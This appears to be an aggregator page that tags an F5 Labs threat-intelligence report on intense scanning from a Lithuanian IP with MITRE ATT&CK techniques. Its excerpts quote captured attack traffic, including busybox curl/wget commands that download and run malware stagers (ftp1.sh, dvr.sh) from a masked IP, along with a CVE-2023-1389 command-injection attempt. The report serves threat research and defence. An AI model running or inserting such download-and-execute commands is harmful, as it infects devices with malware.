TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

Continued Intense Scanning From One IP in Lithuania

2024-10-21

ATT&CK techniques detected

5 predictions
T1059.004 Unix Shell
99%
“…p1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; attempts to use the busybox binary to run wget to fetch a file called ftp1.sh and save that to the file /tmp/ftp1.sh on the target machine, use the busybox binary to run the ch…”
T1059.004 Unix Shell
99%
“sh -g 103.1 this was clearly an attempt to exploit CVE-2023-1389, our top scanned-for CVE in September. One can also easily see that this is a command injection vulnerability in the ‘country’ parameter. The specifics are representative of what we see in command injection …”
T1059.004 Unix Shell
92%
“ftp1.sh; /bin/busybox curl http://xxx.xxx.xxx.xxx/dvr.sh -o /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox curl http://xxx.xxx.xxx.xxx/ftp1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/…”
T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol
91%
“…x.xxx/ftp1.sh -o /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; curl http://xxx.xxx.xxx.xxx/dvr.sh -o /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; curl http://xxx.xxx.xxx.xxx/ftp1.sh -o /tmp/ftp1.sh &…”
T1071.001 Web Protocols
86%
“the very least show that some CVEs are attempted to be used, and moreover, attempt to download malware stagers, because this data is included in the traffic they send. For example, the most common URL of this type observed in September, after URL decoding, was this (with IP addr…”

Summary

Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.